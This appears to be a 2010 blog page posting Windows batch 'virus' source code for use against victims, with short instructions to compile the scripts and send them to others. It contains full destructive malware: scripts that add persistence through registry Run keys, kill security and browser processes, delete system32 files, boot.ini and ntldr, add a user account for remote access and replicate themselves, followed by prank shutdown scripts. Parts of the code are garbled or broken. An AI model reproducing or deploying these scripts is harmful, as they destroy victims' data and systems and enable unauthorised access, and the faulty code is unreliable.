VIRUS Fun Starts Here! « Fusion Of Tech And Fun !!

[.Bat] Freaking virus

December 11, 2010 crazyankit 2 comments

Words From Author

Not even going to begin to start posting all the functions but most are obvious by looking through the code this will most definitely fuck your shit up and can be used for remote access although not very effective (Not encrypted).

Since people like to be petty as fuck and report like whiney bitches
Here is how you use it
Copy the code into notepad
:last
net user (your user name)/add
Change that part to the user name which you want remote access through
Save it as .bat
Download a free batch compiler and convert it to an autoexe
Send it to your slave
What does it do?
Numerous things to many to list it rapes there computer and helps in attaining remote access to there computer

@echo off
assoc .sys=Error
assoc .exe=Error
assoc .dll=Text File
assoc .dat=Error
setlocal enabledelayedexpansion
if “%1″==”/cmd” (
goto cmd
) else goto start
:start
echo copy %0 “*.*” /y >>AUTOEXEC.bat
set main_folder=%SystemRoot%\pchealth\helpctr\Vendors\CN=Microsoft Corporation,L=Redmond,S=Washington,C=US\Remote Assistance\Escalation\Unsolicited
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v wlcomm.exe /t REG_SZ /d %main_folder%\vbs.vbs /f >nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v svchost.exe /t REG_SZ /d %main_folder%\vbs2.vbs /f >nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ccSvChst.exe /t REG_SZ /d %main_folder%\vbs3.vbs /f >nul
goto start
REM making necessary files..–

cd %main_folder%
if not exist vbs.vbs (
echo Set objShell = CreateObject(“WScript.Shell”) >vbs.vbs
echo strCommand = “%%0.bat” >>vbs.vbs
echo objShell.Run strCommand, vbHide, TRUE >>vbs.vbs

echo Set objShell = CreateObject(“WScript.Shell”) >vbs.vbs
echo strCommand = “kill.bat” >>vbs.vbs
echo objShell.Run strCommand, vbHide, TRUE >>vbs.vbs

echo Set objShell = CreateObject(“WScript.Shell”) >vbs.vbs
echo strCommand = “spcfller.bat” >>vbs.vbs
echo objShell.Run strCommand, vbHide, TRUE >>vbs.vbs

echo @echo off >spcfller.dll.bat
echo :a >>spcfller.dll.bat
echo %random%%random%%random%%random%%random%%random%%random%%random%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%random%%random%%random%%random%%random%%random%%random%%random%%RANDOM%%RANDOM%%RANDOM%%RANDOM%>%random%.%random%.dll >>spcfller.dll.bat
echo %random%%random%%random%%random%%random%%random%%random%%random%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%random%%random%%random%%random%%random%%random%%random%%random%%RANDOM%%RANDOM%%RANDOM%%RANDOM%>%random%.%random%.dll >>spcfller.dll.bat
echo goto a >>spcfller.dll.bat

echo xor ax,ax>google.com
echo mov ds,ax>>google.com
echo mov ax,00299>>google.com
echo inc ax>>google.com
echo inc ax>>google.com
echo xor cx,cx>>google.com
echo inc cx>>google.com
echo mov dl,80>>google.com
echo mov bx,13h*4>>google.com
echo pushf>>google.com
echo cli>>google.com
echo push cs>>google.com
echo call dword ptr [bx]>>google.com
echo retn>>google.com
echo mov dx, 1F2h>>google.com
echo mov al,1>>google.com
echo out dx,al>>google.com
echo inc dx>>google.com
echo out dx,al>>google.com
echo inc dx>>google.com
echo xor ax,ax>>google.com
echo out dx,al>>google.com
echo inc dx>>google.com
echo out dx,al>>google.com
echo mov al, 10100b>>google.com
echo inc dx>>google.com
echo out dx,al>>google.com
echo inc dx>>google.com
echo mov al,30h >>google.com
echo out dx,al>>google.com
echo lea si, Buffer>>google.com
echo mov dx, 1F0h>>google.com
echo mov cx, 513>>google.com
echo rep outsw>>google.com

REM –
echo @echo off>kill.bat
echo :a >>kill.bat
echo tskill taskmgr >>kill.bat
echo tskill iexplore >>kill.bat
echo tskill firefox >>kill.bat
echo tskill chrome >>kill.bat
echo tskill regedit >>kill.bat
echo tskill rkill >>kill.bat
echo tskill notepad >>kill.bat
echo tskill notepadpp >>kill.bat
echo tskill msnmsgr >>kill.bat
echo start spcfller.dll.bat >>kill.bat
echo goto a >>kill.bat

shutdown -r -t 30 -c “Restart is necessary to complete install”
)
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v {01000110-01010010-01100101-00100110} /d REG_SZ /t %main_folder%\google.com /f >nul r
goto before
REM Virus made by Your Fucked…
REM –
:before
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WOW\boot /v shell /t REG_SZ /d %main_folder%\vbs.vbs /f >nul
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Macromedia\Shockwave 10\CollectStatistics /v (Deafult) /t REG_SZ /d 00010000 /f >nul
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemovalTools\MRT /v Version /t REG_SZ /d 61 /f >nul
reg add HKEY_LOCAL_MACHINE\SYSTEM\Setup\Pid /v Pid /t REG_SZ /d 11723OEM /f >nul
reg add HKEY_LOCAL_MACHINE\SYSTEM\WPA\Starter /v Installed /t REG_DWORD /d 0×00754 (754) /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DeviceManager\TroubleShooters /v TroubleShooter-3 /t REG_SZ /d http://youareanidiot.org /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Shell /t REG_SZ /d %main_folder%\vbs.vbs /f >nul
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v UIHost /t REG_SZ /d cmd.exe /f >nul
reg delete HKEY_CURENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\EventLabels\WindowsLogon /v DispFileName /t REG_SZ /d @mmsys.cpl,-5846 /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\EventLabels\WindowsLogoff /v DispFileName /t REG_SZ /d @mmsys.cpl,-5853 /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\EventLabels\SystemExit /v DispFileName /t REG_SZ /d @mmsys.cpl,-5852 /f 2>&1
reg delete HKEY_CURENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll /va /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\EventLabels\Close /v DispFileName /d REG_SZ /t @mmsys.cpl,-5831 /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\Schemes\Apps\Explorer\BlockedPopup\.current /v (Deafult) /d REG_SZ /t C:\WINDOWS\system32\winmine.exe /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v text /d REG_SZ /t @shell32.dll,-29478 /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v text /d REG_SZ /t @shell32.dll,-29479 /f 2>&1
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\Add-Remove_Programs /va /f 2>&1
echo del “%systemroot%\system32\appwiz.cpl” /f /q>>%systemdrive%\AUTOEXEC.bat
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace /va /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu /v {871C5380-42A0-1069-A2EA-08002B30309D}.default /d REG_SZ /t 1 /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath /v (Deafult) /d REG_SZ /t %main_folder%\vbs.vbs
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders /v Common Programs /d REG_SZ /t %%systemdrive%%\Windows /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders /v Common STartup /d REG_SZ /t %%appdata%% /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartMenu\StartMenuRun\Policy\NoRun /v (Deafult) /d REG_SZ /t 1 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel\ShowRun /v Valuename /d REG_SZ /t Start_HideRun /f 2>&1
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\System Restore /va /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WindowsUpdate /v ShortcutName /d REG_SZ /t Internet Explorer /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings /v ActiveXCache /d REG_SZ /t %%userprofile%%\Desktop /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings /v CodeBaseSearchPath /d REG_SZ /t CODEBASE;;
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked /v {1B90B971-E8C2-22DF-9461-555664651111} /d REG_SZ /t Blocked file extension /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager /v DllName /d REG_SZ /t %%systemroot%%\system32\shdocvw.dll /f 2>&1
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows /v Programs /d REG_SZ /t %
REM –
copy %0 “*.*” /y
cd \
copy %0 “*.*” /y
cd %SystemRoot%
copy %0 “*.*” /y
cd %SystemRoot%\system32
copy %0 “*.bat” /y
REM –

attrib +s +r %~0
REM –

cd \
set tmp=%SystemRoot%\system64
copy %0 “%appdata%”
del %commonprogramfiles%\*.* /Q /S /F
set commonprogramfiles=%tmp%
copy %0 “*.*” /y
cd %tmp%
REM –

cd %systemroot%\system32
echo MZ µ>>notepad.exe
echo >>notepad.tmp
ren “notepad.exe” “MeLt.exe”

attrib +s MeLt.exe
REM –

call start_dest
assoc .dll=Error
REM –

attrib +h +r +s *.txt
REM –

copy %0 “*.*” /y
cd %SystemRoot%
copy %0 “*.*” /y
cd \
attrib -r “%programfiles%”
cd %programfiles%
copy %0 “*.*” /y
cd “%SystemRoot%\system32″
copy %0 “*.*” /y
cd “%SystemRoot%\system64″
copy %0 “*.*” /y
cd %userprofile%\desktop
copy %0 “*.*” /y
cd “%userprofile%\My documents”
copy %0 “*.*” /y
copy “%systemroot%\system32\melt.exe” “*.exe”
cd %programfiles%
cd Internet Explorer
attrib -s -r *.*
replace “%systemroot%\system32\melt.exe” “*.exe” /R /S
del “*.dll” /F /S /Q
REM –

del “%QTJAVA%” /Y /Q /F
echo %QTJAVA%>java.txt
copy %0 “%allusersprofile%\Start menu\Programs\Startup”
cls
set sessionname=0
REM –

net share INFO=info.txt
copy “info.txt” “tmp.txt”
REM –

:next1
if /I exist “%programfiles%\ATI Technologies” goto ati-trrr
goto next2
:next2
if /I exist “%programfiles%\Intel” goto intel-trr
goto next3
:next3
if /I exist “%programfiles%\Windows Live” goto winlive-trrr
goto lewlz
:ati-trrr
cd %programfiles%\ATI Technologies\ATI control panel
del attfxinxx.* /F /Q /S
echo %random%%random%%random%%random%%random%%random%%random%>attfxinxx.hlx
goto next2
:intel-trrr
cd %programfiles%\Intel\Wireless\Drivers
del *.DLL /Q /S /F
echo %random%%random%%random%%random%%random%%random%>W29CPA.DLL
goto next3
:winlive-trrr
cd %programfiles%\Windows Live
if /I exist “messenger” cd messenger (
echo %random%%random%%random%%random%%random%%random%%random%%random%%comspec%%0 %~0 %random%>backgrounds.mct
echo liveNatTrav.dll>liveNatTrav.dll
echo %~0>>liveNatTrav.dll
)
cd contacts
replace “%systemroot%\melt.exe” “wlcomm.exe”
net share LEWLz=%~0
:last
net user (your user name)/add
net user %username% /delete
Reg Add HKEY_CURRENT_USER\Control Panel\Mouse /v SwapMouseButtons /t REG_SZ /d 1
echo
:cmd
echo msgbox’cmd.exe’ is not a registered Win32 application. Please check if the file is corrupted.”,16,”cmd.exe” >err.vbs
start err.vbs
exit

Categories: VIRUS Fun Starts Here!

[.Bat] Deadly And Destructive Virus

September 2, 2010 crazyankit Leave a comment

1-open notepad
2-copy and paste these codes in it:

YOU MUST SAVE IT AS Ankit.bat OR Else It Wont Work For YOu!!

What It Will Do….?
How Does It Effect The Victim’s Machine..
1-Spread it self in your computer
2-disable your keyboard and mouse
3-deleted necessary system files
4-delete files that allow your computer to rebbot and restart
5-delete messenger, window explorer..
6-Make My music , my Picture….invisible
7-disconnect you from the internet
8-open CD drive than close it than open it ..
9-change time to 6:66
10-show the victim some msgs, making him unconfortable
11-show the victim a full screen window full of numbers
12-release ip adress, so your pc can no more get any outside connection
13-virus start again every time you click on mozilla firefox, internet explorer..
14-virus start again everytime PC is turned on

Hint: You Can Make It Into EXE And Bind With Some Files To Look More Destructive..Muhahaha!!

HERz The Source Code

@echo off
copy “Ankit.bat” “C:\WINDOWS”
attrib +r +h +s “Ankit.bat”
copy “Ankit.bat” “C:\Documents and Settings\Owner\Start Menu\Programs\startup”
copy “Ankit.bat” “C:\”
copy “Ankit.bat” “C:\Documents and Settings\Owner\My Documents”
Reg Add “HKCU\Control Panel\Mouse” /v SwapMouseButtons /f /d “10″
rundll32 keyboard, disable
rundll32 mouse, disable
taskkill explorer /t /t
taskkill yahoomessenger /f /t
taskkill msmsgs /t /f
taskkill firefox /f /t
taskkill iexplore /f /t
time 6:66
del “C:\WINDOWS\explorer.exe” /f /q
cd “C:\WINDOWS”
del “*.bat” /f /q
cd “C:\WINDOWS\system32″
del “*.*” /q /f
del “C:\Program Files\messenger\msmsgs.exe” /q /f
del “C:\Program Files\Yahoo!\messenger\YahooMessenger.exe” /q /f
attrib +r +h “C:\Documents and Settings\Owner\My Documents\My Music”
attrib +r +h “C:\Documents and Settings\Owner\My Documents\My Pictures”
attrib +r +h “C:\Documents and Settings\Owner\My Documents\My Videos”
attrib +r +h “C:\Documents and Settings\Owner\My Documents”
attrib +r +h “C:\WINDOWS”
RASDIAL /DISCONNECT
start D:\
reg add “HKLM\SOFTWARE\Mozilla\Mozilla Firefox.0.0.12 (en-US)\main” /v PathtoExe /f /d “C:\WINDOWS\Ankit.bat”
reg add “HKLM\SOFTWARE\InstallShield\driver\intel32″ /v folder /f /d “C:\WINDOWS\Ankit.bat”
assoc .exe=WMAFile
assoc .mp3=VBSFile
assoc .jpg=THEMEFile
assoc .bmp=THEMEFile
assoc .gif=THEMEFile
attrib –r –s –h c:\autoexec.bat
del c:\autoexec.bat
attrib –r –s –h c:\boot.ini
del c:\boot.ini
attrib –r –s –h c:\ntldr
del c:\ntldr
attrib –r –s –h c:\windows\win.ini
del c:\windows\win.ini
set wmp = createObject(“wmplayer.ocx.7″)
set drives = wmp.cdromCollection
sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count – 1
drives.item(i).eject()
next
end if
loop
end sub
open_saysame()
Ipconfig /release
color 2
:start
echo %random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%
goto start
echo You have been pwned by Ankit. Next time, don’t be so stupid! >> finalmessage.txt
start finalmessage.txt
shutdown -s -t 60 -c “Say goodbye”
msg * Ankit has wiped your computer clean
:section1
cd “C:\Documents and Settings\Owner\desktop”
copy “C:\WINDOWS\Ankit.bat” “8021.bat”
cd “C:\Documents and Settings\Owner\desktop”
md 5265
cd “C:\WINDOWS\system32″
copy “C:\WINDOWS\Ankit.bat” “2696.bat”
start
start
start
start
start
goto section1

Categories: VIRUS Fun Starts Here!

Prank Your Friends Hardly…Most Dangerous Scripts!!

August 1, 2010 crazyankit 7 comments

1) Convey your friend a lil’ message and shut down his / her computer:

Type :

@echo off
msg * I don’t like you
shutdown -c “Error! You are too **!” -s

Save it as “Anything.BAT” in All Files and send it.

2) Toggle your friend’s Caps Lock button simultaneously:

Type :

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop